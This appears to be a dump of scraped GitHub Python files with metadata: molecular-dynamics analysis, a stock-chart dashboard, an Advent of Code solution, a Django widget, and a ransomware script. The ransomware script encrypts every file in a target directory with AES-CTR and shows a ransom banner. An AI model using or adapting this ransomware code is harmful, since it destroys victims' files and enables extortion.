"seaborn.set", "line_number": 334, "usage_type": "call"}, {"api_name": "seaborn.load_dataset", "line_number": 336, "usage_type": "call"}, {"api_name": "seaborn.pairplot", "line_number": 337, "usage_type": "call"}]} +{"seq_id": "35383435035", "text": "'''Perimeter monitoring for MD simulations using MDAnalysis'''\nimport glob\nimport MDAnalysis\nfrom MDAnalysis.analysis import distances\nimport numpy as np\n\n# Please change the workdir here..\nworkdir = 'REPLACEME'\n\ntop = glob.glob(\"{0}/**/{1}\".format(workdir.rstrip(\"/\"), '*-in-noh2o.pdb'), recursive=True)[0]\ntraj = glob.glob(\"{0}/**/{1}\".format(workdir.rstrip(\"/\"), \"*.dcd\"), recursive=True)[0]\noutputpath = \"{0}/{1}\".format(workdir.rstrip(\"/\"), \"perimeter.csv\")\n\n# For manual mode..\n#top = '/mdspace/mstahnke/2007_2YDV_Na_MD/2YDV_Na_MD-in-noh2o.pdb'\n#traj = '/mdspace/mstahnke/2007_2YDV_Na_MD/2YDV_Na_MD_trj/allframes-noh2o.dcd'\n#outputpath = '/mdspace/mstahnke/2007_2YDV_Na_MD/perimeter.csv'\n\n\nu = MDAnalysis.Universe(top, traj) # Creating MDAnalysis universe aka loading in MD data\nprint('Created MDUniverse successfully.')\n\n# creating atom selections for later use\ns1 = u.select_atoms(\"resid 246 and resname TRP and name CA\")\ns2 = u.select_atoms(\"resid 91 and resname SER and name CA\")\ns3 = u.select_atoms(\"resid 52 and resname ASP and name CA\")\ns4 = u.select_atoms(\"resid 280 and resname ASN and name CA\")\nlig = u.select_atoms(\"resid 400\")\nsodium = u.select_atoms(\"resid 2402\")\n\n# getting distances\ndistdict = {}\ndistpairs = [(s1, s2), (s2, s3), (s3, s4), (s4, s1)]\nstep = -1\nperilist = []\nprint('Starting perimeter calculations.')\nfor ts in u.trajectory:\n step += 1\n peri = 0.0\n for n, distpair in enumerate(distpairs):\n a = distpair[0]\n b = distpair[1]\n # distance array cropped to the distance between selections rounded to two decimal digits\n dist = round(MDAnalysis.analysis.distances.dist(a, b)[2, 0], 2)\n peri += dist\n perilist.append([step, u.trajectory.time, peri])\nperilist = np.array(perilist)\n\nprint('Finished perimeter calculations and writing out file to \\\"{}\\\"'.format(outputpath))\n# adding distances\n# writing out\nif outputpath is not None:\n np.savetxt(outputpath, perilist, delimiter=',') # writing to file\n", "repo_name": "dmachalz/mdanalysis", "sub_path": "perimetermonitor.py", "file_name": "perimetermonitor.py", "file_ext": "py", "file_size_in_byte": 1977, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "glob.glob", "line_number": 10, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 11, "usage_type": "call"}, {"api_name": "MDAnalysis.Universe", "line_number": 20, "usage_type": "call"}, {"api_name": "MDAnalysis.analysis.distances.dist", "line_number": 44, "usage_type": "call"}, {"api_name": "MDAnalysis.analysis", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "28393631436", "text": "from datetime import date\nimport importlib\nfrom pandas.core.indexes import period\nimport talib \n\n# Stadard Python packages\nimport numpy as np\nimport pandas as pd\n\n# # Standard plotly imports\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objs as go \nimport dash\nfrom dash import dcc\nfrom dash import html\nfrom dash.dependencies import Input, Output\n\n# Our Libraries\nfrom db import config\nfrom db.database import DataBase\n\n\n## Initialize the DB\ndb = DataBase(config.DB_ACCESS[config.DB_LOCATION])\n\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\n# Create the dropdown lists\ndb.execute(\"SELECT id, name, symbol from stocks\")\nrv = db.cursor.fetchall()\n\nticker_dict = { entry[2] : entry for entry in rv}\nticker_dropdown_options = [{\"label\": ticker, \"value\" : ticker} for ticker in list(ticker_dict)]\nallowable_time_frames = [\"1Min\"]\ntime_frame_dropdown_options = [{\"label\": time_frame, \"value\" : time_frame} for time_frame in allowable_time_frames]\ntechnical_periods_dropdown_options = [{\"label\" : i, \"value\" : i} for i in range(5,500)]\n\n\napp.layout = html.Div(children=[\n\n ## Top Section\n html.Div([\n html.H1(\"Stock Screener \"),\n html.H3(id=\"company-name\")\n ], style = {\"textAlign\" : \"center\"} ),\n html.Div([\n html.Div([\n html.Label(\"Ticker:\"),\n dcc.Dropdown(\n id='ticker-dropdown',\n options=ticker_dropdown_options,\n value=\"AAPL\"\n )], style={\"width\" : 100, \"margin-right\": \"30px\"}),\n\n html.Div([\n html.Label(\"Time-Frame:\"),\n dcc.Dropdown(\n id='time-frame-dropdown',\n options=time_frame_dropdown_options,\n value= \"1Min\",\n )], style={\"width\" : 100, \"margin-right\": \"30px\"}),\n \n html.Div([\n html.Label(\"Number Of Periods:\"),\n dcc.Input(\n id='num-periods-input',\n type='number',\n value=200,\n debounce=True\n )], style={\"width\" : 200})\n ],\n style={\"columnCount\" : 3, \"display\" : \"flex\", \"justify-content\" : \"center\"}),\n \n ## Graph\n html.Div(\n id=\"graph-container\",\n children=dcc.Graph(id='quant-chart',\n style={'height' : 650}),\n style={'backgroundColor' : 'rgba(250,250,250,1)'}\n ),\n\n ## Bottm Technical Analysis settings\n html.Div([\n html.Center([html.H3(\"Technical Analysis Settings\")]),\n html.Div(\n [\n html.Div([\n\n html.Div([\n html.Label(\"SMA-Periods:\", style={\"height\":40}),\n html.Label(\"EMA-Periods:\", style={\"height\":40}),\n html.Label(\"Bollinger Bands Period:\", style={\"height\":40})\n ], style={\"width\" : 180}),\n\n html.Div([\n dcc.Dropdown(\n id='sma-periods-dropdown',\n multi = True,\n options = technical_periods_dropdown_options,\n value = [100]\n ),\n dcc.Dropdown(\n id=\"ema-periods-dropdown\",\n multi = True,\n options = technical_periods_dropdown_options,\n value = [20]\n ),\n dcc.Input(\n id='bb-bands-period-dropdown',\n type='number',\n value = 20,\n debounce=True,\n ),\n ], style={\"width\" : 210})\n ],\n style={\"columnCount\":2, \"display\" : \"flex\", \"height\" : 600, \"margin-right\": \"30px\"}),\n\n html.Div([\n\n html.Div([\n html.Label(\"MACD periods:\", style={\"height\":40}),\n html.Label(\"MACD Signal Period:\", style={\"height\":40})\n ], style={\"width\" : 150}),\n\n html.Div([\n dcc.Dropdown(\n id=\"macd-periods-dropdown\",\n multi = True,\n options = technical_periods_dropdown_options,\n value = [20, 12]\n ),\n dcc.Input(\n id='macd-signal-period',\n type='number',\n value=9,\n debounce=True\n )\n ], style={\"width\" : 210})\n ], style={\"columnCount\":2, \"display\" : \"flex\", \"height\" : 400 })\n ], style={\"columnCount\" : 2, \"display\" : \"flex\", \"justify-content\" : \"center\"})\n ])\n])\n\n\n@app.callback( \n [Output('quant-chart','figure'),\n Output('company-name', 'children')],\n [Input('ticker-dropdown', 'value'),\n Input('time-frame-dropdown', 'value'),\n Input('num-periods-input', 'value'),\n Input('sma-periods-dropdown', 'value'),\n Input('ema-periods-dropdown', 'value'),\n Input('bb-bands-period-dropdown', 'value'),\n Input('macd-periods-dropdown', 'value'),\n Input('macd-signal-period', 'value')])\ndef update_plot(ticker : str,\n time_frame : str,\n periods : int,\n sma_periods : list[int] ,\n ema_periods : list[int] ,\n bb_band_periods: int , \n macd_periods: list[int] ,\n macd_signal_period : int,\n ):\n\n if ticker is None: ticker = \"AAPL\"\n if time_frame is None : time_frame = \"1Day\"\n if periods is None: periods = 200\n if not sma_periods: sma_periods = [100]\n if not ema_periods: ema_periods = [20]\n if bb_band_periods is None: bb_band_periods = 20\n if not macd_periods or len(macd_periods) < 2: macd_periods = [20, 12]\n if macd_signal_period is None : macd_signal_period = 9\n\n max_ta_periods = max(sma_periods + ema_periods + [periods, bb_band_periods, macd_signal_period] + macd_periods)\n\n\n # Get requested num of points\n sql_cmd = f\"\"\"\n SELECT * FROM price_minute \n WHERE stock_id = {ticker_dict[ticker][0]}\n ORDER BY date_time DESC\n LIMIT {periods + max_ta_periods }\n \"\"\"\n db.execute(sql_cmd)\n rv = db.cursor.fetchall()\n\n data = { pd.Timestamp(p[1]) : {\"o\" : p[2], \"h\" : p[3], \"l\" : p[4], \"c\" : p[5], \"v\" : p[6]} for p in rv}\n df = pd.DataFrame(data.values(), data.keys())\n df.sort_index(inplace = True)\n \n # # Create the plot with all of the traces\n fig = make_subplots(rows=4, row_heights=[0.2, 0.6, 0.2, 0.2], vertical_spacing=0, horizontal_spacing=0, shared_xaxes=True)\n\n # Add to the top subplot\n dates = df.index\n rsi = talib.RSI(df.c)\n fig.add_traces(data=[go.Scatter(x=dates, y=rsi, name=\"RSI\", line_width=0.7, showlegend=False),\n go.Scatter(x=dates, y= [70]*len(dates), line=dict(color='black', width=0.5), showlegend=False, hoverinfo='skip'),\n go.Scatter(x=dates, y= [30]*len(dates), line=dict(color='black', width=0.5), showlegend=False, hoverinfo='skip'),\n go.Scatter(x=dates, y= [50]*len(dates), line=dict(color='black', width=0.5 , dash='dash'), showlegend=False, hoverinfo='skip')],\n rows=1,\n cols=1\n )\n \n # # Add the the middle subplot\n bb_high, bb_mid, bb_low = talib.BBANDS(df.c, timeperiod=bb_band_periods)\n trace_data=[go.Candlestick(x=dates,open=df.o, high=df.h, low=df.l, close=df.c, name=ticker),\n go.Scatter(x=dates, y=bb_high, name=\"Bollinger Bands\", line_width=0.5, line_color='rgba(164, 224, 248, 1)', legendgroup=\"bbands\"),\n go.Scatter(x=dates, y=bb_low, name=\"low\", fill='tonexty', line_width=0.5, line_color='rgba(164, 224, 248, 1)', fillcolor='rgba(164, 224, 248, 0.3)', legendgroup=\"bbands\", showlegend=False, hoverinfo='skip'),\n go.Scatter(x=dates, y=bb_mid, name=\"mean\", line_width = 0.5, line_color = 'rgba(164, 224, 255, 1)', legendgroup=\"bbands\",showlegend=False, hoverinfo='skip')\n ]\n\n\n trace_data.extend([go.Scatter(x=dates, y=talib.SMA(df.c, per), name=f\"SMA{per}\", line_width=0.7) for per in sma_periods])\n trace_data.extend([go.Scatter(x=dates, y=talib.EMA(df.c, per), name=f\"EMA{per}\", line_width=0.7) for per in ema_periods]) \n fig.add_traces(data=trace_data, rows=2, cols=1)\n\n # # Add Volume plot\n volume_data = [go.Bar(x=dates, y=df.v, name=\"Volume\", showlegend=False),\n go.Scatter(x=dates, y=talib.OBV(df.c, df.v), name=\"OBV\", line_width=0.5)]\n fig.add_traces(data=volume_data, rows=3, cols=1)\n\n # # # Add to the bottom subplot\n macd, macdsignal, macdhist = talib.MACD(df.c, fastperiod = min(macd_periods), slowperiod = max(macd_periods), signalperiod = macd_signal_period)\n \n gtz_mask = (macdhist > 0).to_numpy()\n ltz_mask = (macdhist <= 0).to_numpy()\n fig.add_traces(data=[go.Scatter(x=dates, y=macd, name=f\"MACD({max(macd_periods)},{min(macd_periods)}, {macd_signal_period})\", line_width=0.7, line_color=\"black\", legendgroup=\"macd\"),\n go.Scatter(x=dates, y=macdsignal, name=f\"Signal({macd_signal_period})\", line_width=0.7, line_color=\"red\", showlegend=False, legendgroup=\"macd\"),\n go.Bar(x=dates[gtz_mask], y=macdhist[gtz_mask], marker=dict(color='green'), showlegend=False, hoverinfo='skip'),\n go.Bar(x=dates[ltz_mask], y=macdhist[ltz_mask], marker=dict(color='red'), showlegend=False, hoverinfo='skip')],\n rows=4,\n cols=1)\n\n fig.update_layout(\n plot_bgcolor='rgba(250,250,250,1)',\n paper_bgcolor='rgba(250,250,250,1)',\n hovermode='x unified',\n legend=dict(orientation=\"h\", xanchor=\"center\", y=1.1, x=0.5),\n ) \n\n\n fig.update_xaxes(rangeslider_visible=False, visible=True, range = (dates[max_ta_periods], dates[-1]))\n fig.update_yaxes(row=1, col=1, title=\"RSI\", tickvals = [30, 50, 70])\n fig.update_yaxes(row=2, col=1, title=\"Share Price\")\n fig.update_yaxes(row=3, col=1, title=\"Volume\")\n fig.update_yaxes(row=4, col=1, title=\"MACD\")\n\n\n\n return [fig, ticker_dict[ticker][1]]\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n \n", "repo_name": "jkalish14/AlgoTrading_Colab", "sub_path": "algotradingcolab/stockScreener.py", "file_name": "stockScreener.py", "file_ext": "py", "file_size_in_byte": 10675, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "db.database.DataBase", "line_number": 24, "usage_type": "call"}, {"api_name": "db.config.DB_ACCESS", "line_number": 24, "usage_type": "attribute"}, {"api_name": "db.config", "line_number": 24, "usage_type": "name"}, {"api_name": "db.config.DB_LOCATION", "line_number": 24, "usage_type": "attribute"}, {"api_name": "dash.Dash", "line_number": 28, "usage_type": "call"}, {"api_name": "db.execute", "line_number": 31, "usage_type": "call"}, {"api_name": "db.cursor.fetchall", "line_number": 32, "usage_type": "call"}, {"api_name": "db.cursor", "line_number": 32, "usage_type": "attribute"}, {"api_name": "dash.html.Div", "line_number": 41, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 41, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 44, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 44, "usage_type": "name"}, {"api_name": "dash.html.H1", "line_number": 45, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 45, "usage_type": "name"}, {"api_name": "dash.html.H3", "line_number": 46, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 46, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 48, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 48, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 49, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 49, "usage_type": "name"}, {"api_name": "dash.html.Label", "line_number": 50, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 50, "usage_type": "name"}, {"api_name": "dash.dcc.Dropdown", "line_number": 51, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 51, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 57, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 57, "usage_type": "name"}, {"api_name": "dash.html.Label", "line_number": 58, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 58, "usage_type": "name"}, {"api_name": "dash.dcc.Dropdown", "line_number": 59, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 59, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 65, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 65, "usage_type": "name"}, {"api_name": "dash.html.Label", "line_number": 66, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 66, "usage_type": "name"}, {"api_name": "dash.dcc.Input", "line_number": 67, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 67, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 77, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 77, "usage_type": "name"}, {"api_name": "dash.dcc.Graph", "line_number": 79, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 79, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 85, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 85, "usage_type": "name"}, {"api_name": "dash.html.Center", "line_number": 86, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 86, "usage_type": "name"}, {"api_name": "dash.html.H3", "line_number": 86, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 87, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 87, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 89, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 89, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 91, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 91, "usage_type": "name"}, {"api_name": "dash.html.Label", "line_number": 92, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 92, "usage_type": "name"}, {"api_name": "dash.html.Label", "line_number": 93, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 93, "usage_type": "name"}, {"api_name": "dash.html.Label", "line_number": 94, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 94, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 97, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 97, "usage_type": "name"}, {"api_name": "dash.dcc.Dropdown", "line_number": 98, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 98, "usage_type": "name"}, {"api_name": "dash.dcc.Dropdown", "line_number": 104, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 104, "usage_type": "name"}, {"api_name": "dash.dcc.Input", "line_number": 110, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 110, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 120, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 120, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 122, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 122, "usage_type": "name"}, {"api_name": "dash.html.Label", "line_number": 123, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 123, "usage_type": "name"}, {"api_name": "dash.html.Label", "line_number": 124, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 124, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 127, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 127, "usage_type": "name"}, {"api_name": "dash.dcc.Dropdown", "line_number": 128, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 128, "usage_type": "name"}, {"api_name": "dash.dcc.Input", "line_number": 134, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 134, "usage_type": "name"}, {"api_name": "db.execute", "line_number": 187, "usage_type": "call"}, {"api_name": "db.cursor.fetchall", "line_number": 188, "usage_type": "call"}, {"api_name": "db.cursor", "line_number": 188, "usage_type": "attribute"}, {"api_name": "pandas.Timestamp", "line_number": 190, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 191, "usage_type": "call"}, {"api_name": "plotly.subplots.make_subplots", "line_number": 195, "usage_type": "call"}, {"api_name": "talib.RSI", "line_number": 199, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 200, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 200, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 201, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 201, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 202, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 202, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 203, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 203, "usage_type": "name"}, {"api_name": "talib.BBANDS", "line_number": 209, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Candlestick", "line_number": 210, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 210, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 211, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 211, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 212, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 212, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 213, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 213, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 217, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 217, "usage_type": "name"}, {"api_name": "talib.SMA", "line_number": 217, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 218, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 218, "usage_type": "name"}, {"api_name": "talib.EMA", "line_number": 218, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 222, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 222, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 223, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 223, "usage_type": "name"}, {"api_name": "talib.OBV", "line_number": 223, "usage_type": "call"}, {"api_name": "talib.MACD", "line_number": 227, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 231, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 231, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 232, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 232, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 233, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 233, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Bar", "line_number": 234, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 234, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 148, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 149, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 150, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 151, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 152, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 153, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 154, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 155, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 156, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 157, "usage_type": "call"}]} +{"seq_id": "39168221995", "text": "from data import requirements\nfrom time import time\nimport re\n\nstart_time = time()\n\nreq_pattern = re.compile('Step (?P.).* step (?P.)')\ntasks = {}\n\n# Extract tasks and dependecies\nfor requirement in requirements:\n\tparsed = req_pattern.search(requirement).groupdict()\n\ttask = parsed['step']\n\ttask_dep = parsed['dependency']\n\tif task not in tasks:\n\t\ttasks[task] = set()\n\tfor dep_task in task_dep:\n\t\tif dep_task not in tasks:\n\t\t\ttasks[dep_task] = set()\n\ttasks[task].add(task_dep)\n\ntodo = set(tasks.keys())\ndone = []\ntodo_changed = True\nwhile len(todo) > 0:\n\t# Search available tasks\n\tavailable = set()\n\tfor task in todo:\n\t\tif set(tasks[task]).issubset(set(done)):\n\t\t\tavailable.add(task)\n\n\t# Do first task alphabetically\n\ttask_to_do = sorted(list(available))[0]\n\tdone.append(task_to_do)\n\ttodo.remove(task_to_do)\n\nprint('Solution', ''.join(done))\n\nprint('Finished in', time() - start_time)\n", "repo_name": "mikeful/aoc_2018", "sub_path": "07/tasklist3.py", "file_name": "tasklist3.py", "file_ext": "py", "file_size_in_byte": 903, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "time.time", "line_number": 5, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 7, "usage_type": "call"}, {"api_name": "data.requirements", "line_number": 11, "usage_type": "name"}, {"api_name": "time.time", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "9780450907", "text": "#!/usr/bin/python3.6\n# -*- coding: utf-8 -*-\n\nfrom Crypto.Cipher import AES\nfrom Crypto.Util import Counter\nimport argparse\nimport os\nimport FileWalker\nimport Crypter\n\n#-------------\n# A Senha pode ter os seguintes tamanhos:\n# 128/192/256 bits - 8 bits = 1 byte = 1 letra unicode\n#-------------\n\nHARDCODED_KEY = 'hackware strike force strikes u!'\n\ndef get_parser():\n parser=argparse.ArgumentParser()\n parser.add_argument(\n '-d',\n '--decrypt', \n help='Desencripta os arquivos [default:no]',\n action='store_true'\n )\n return parser\n\n#Logica Principal\ndef main():\n parser = get_parser()\n args = vars(parser.parse_args())\n is_decrypt = args ['decrypt']\n\n if is_decrypt:\n print('''\n HACKWARE STRIKE FORCE\n --------------------------------------------\n Seus arquivos foram criptografados.\n Para decriptá-los utilize a seguinte senha'{}'\n '''.format(HARDCODED_KEY))\n key= input('Digite a senha > ')\n else:\n if HARDCODED_KEY:\n key = HARDCODED_KEY\n\n\n #Gera a Cifra de cripto\n ctr = Counter.new(128)\n crypto = AES.new(key, AES.MODE_CTR, counter=ctr)\n\n if not is_decrypt:\n cryptoFn = crypto.encrypt\n\n else:\n cryptoFn = crypto.decrypt\n\n #Caminho inicial do walker\n start_path = os.path.abspath(os.path.join(os.getcwd(), 'files'))\n startDirs = [start_path] #Pode especificar mais diretórios\n\n for currentDir in startDirs:\n for filename in FileWalker.walker(currentDir):\n Crypter.write_to_file(filename, cryptoFn)\n\n for _ in range (100):\n pass\n\nif __name__ == '__main__':\n main()\n\n\n", "repo_name": "thegraciano/Ransomware", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1696, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 19, "usage_type": "call"}, {"api_name": "Crypto.Util.Counter.new", "line_number": 48, "usage_type": "call"}, {"api_name": "Crypto.Util.Counter", "line_number": 48, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 49, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 49, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CTR", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 58, "usage_type": "call"}, {"api_name": "FileWalker.walker", "line_number": 62, "usage_type": "call"}, {"api_name": "Crypter.write_to_file", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "40216305178", "text": "# -*- coding: utf-8 -*-\n# This code stolen from http://djangosnippets.org/snippets/951/\nfrom django import forms\nfrom django.utils.safestring import mark_safe\nfrom django.utils.encoding import force_unicode\n\nclass SubmitButton(forms.Widget):\n \"\"\"\n A widget that handles a submit button.\n \"\"\"\n def __init__(self, name, value, label, attrs):\n self.name, self.value, self.label = name, value, label\n self.attrs = attrs\n\n def __unicode__(self):\n final_attrs = self.build_attrs(\n self.attrs,\n type=\"submit\",\n name=self.name,\n value=self.value,\n )\n return mark_safe(u'%s' % (\n forms.widgets.flatatt(final_attrs),\n self.label,\n ))\n\nclass MultipleSubmitButton(forms.Select):\n \"\"\"\n A widget that handles a list of submit buttons.\n \"\"\"\n def __init__(self, attrs={}, choices=()):\n self.attrs = attrs\n self.choices = choices\n\n def __iter__(self):\n for value, label in self.choices:\n yield SubmitButton(self.name, value, label, self.attrs.copy())\n\n def __unicode__(self):\n return '